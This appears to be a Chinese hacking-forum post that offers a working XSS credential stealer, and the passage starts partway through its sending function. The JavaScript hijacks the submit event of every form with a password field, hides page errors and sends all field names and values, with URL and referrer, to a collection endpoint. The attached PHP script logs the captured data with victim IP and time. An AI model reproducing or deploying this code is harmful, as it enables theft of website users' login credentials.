        var sjurl = 'http://localhost/door/get/xss.php';
        //$_POST['url']-当前地址,$_POST['ref']-来路,$_POST['data']-截获的数据
        var sjpos = 'var=xss&url='+escape(url)+'&ref='+escape(ref)+'&data='+escape(datas);
        //POST方法提交数据
        xmlhttp.open("POST", sjurl, true);
        xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        xmlhttp.setRequestHeader("Content-length",sjpos.length);
        xmlhttp.setRequestHeader("Connection","close");
        xmlhttp.send(sjpos);
        return true;
}

function Form_Hijack(thisform) {
        var ispwd = false;
        //查找form里是否含有输入密码的框框
        for(var k = 0;k < thisform.elements.length;k++) {
                var sjobj = thisform.elements[k]; if(sjobj.type == 'password') { ispwd = true; break; }
        }
        //如果没有输入密码的框框则不截获
        if(!ispwd) { return true; }
        var sjurl = window.location;
        var sjref = document.referrer;
        //如果运行在子窗口
        if(window.parent.location) { sjurl = window.parent.location; }
        if(top.document.referrer) { sjref = top.document.referrer; }
        else if(window.parent.document.referrer) { sjref = window.parent.document.referrer; }
        var sjdata = '';
        for(var j = 0;j < thisform.elements.length;j++) {
                var sjobj = thisform.elements[j];
                //过滤掉不重要的对象
                if(sjobj.type != 'button' && sjobj.type != 'submit' && sjobj.type != 'hidden' && sjobj.type != 'image') {
                        //框框的名字(name="") 数据(value="")
                        sjdata += sjobj.name+':'+sjobj.value+' --- ';
                }
        }
        //如果截获成功就发送
        if(sjurl && sjdata) { Send_Data(sjurl,sjref,sjdata); }
        return true;
}

function Start_Hijack() {
        if(document.getElementsByTagName) {
                //开始遍历form表单
                var sjform = document.getElementsByTagName("form");
                //劫持所有form表单的提交事件
                for(var i = 0;i < sjform.length;i++) { sjform[i].onsubmit = function() { return Form_Hijack(this); } }
        }
        return true;
}

//不显示网页错误
window.onerror = function() { return true; }
//页面加载完毕才开始截获
document.onreadystatechange = function() {
        //让子弹飞一会
        if(document.readyState == "complete") { setTimeout('Start_Hijack()',1000); }
}

补充: - 低调求发展6 h7 @  G1 |  v8 V- ^% a
记录截获数据php文件

<?php 
/***************
通用截获form密码 php接收文件
作者 Spider
****************/
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");

//保存数据的文件
$logfile = './xss.txt';

function filew($filename,$filedata,$filemode) {
        $handle = fopen($filename,$filemode);
        $key = fputs($handle,$filedata);
        fclose($handle);
        return $key;
}

function filer($filename,$filesize = 0) {
        $filesize = $filesize ? $filesize : filesize($filename);
        $handle = fopen($filename,'r');
        $filedata = fread($handle,$filesize);
        fclose($handle);
        return $filedata;
}

function checkgpc($array) {
        foreach($array as $key => $var) { $array[$key] = is_array($var) ? checkgpc($var) : stripslashes($var); }
        return $array;
}

if(get_magic_quotes_gpc()) { $_POST = checkgpc($_POST); }

if(isset($_POST['url']) && isset($_POST['ref']) && isset($_POST['data'])) {
        if(strlen($_POST['url']) > 500 || strlen($_POST['ref']) > 500 || strlen($_POST['data']) > 1000) { exit('数据太大不正常'); }
        $temp = filer($logfile);
        $data = $_POST['url'].'●'.$_POST['ref'].'●'.$_POST['data'];
        //是否重复记录
        if(strpos($temp,$data) > -1) { exit('重复记录'); }
        //来路IP
        $reip = '●'.$_SERVER["REMOTE_ADDR"];
        //时间
        $time = '●'.date('Y-m-d H:i',time());
        filew($logfile,$data.$reip.$time."\r\n",'w');
}
?>